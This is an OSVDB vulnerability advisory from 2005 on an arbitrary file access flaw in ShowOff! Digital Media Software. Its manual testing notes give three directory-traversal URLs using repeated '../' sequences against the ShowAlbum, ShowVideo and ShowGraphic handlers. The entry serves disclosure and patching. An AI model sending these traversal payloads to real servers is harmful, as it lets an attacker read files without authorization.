ShowOff! Digital Media Software Request Handling Traversal Arbitrary File Access

2005-05-10T10:13:02
ID OSVDB:16332
Type osvdb
Reporter OSVDB
Modified 2005-05-10T10:13:02

Description

Manual Testing Notes

http://[victim]/ShowAlbum?ShowDetails&1&nocount&/../../../../../../../../[file]
http://[victim]/ShowVideo?1&fullnocount&/../../../../../../../../../../[file]
http://[victim]/ShowGraphic?/../../../../../../../../[file]

References:

Vendor URL: http://www.showoffmypictures.com/
Secunia Advisory ID: 15300
Related OSVDB ID: 16333
CVE-2005-1571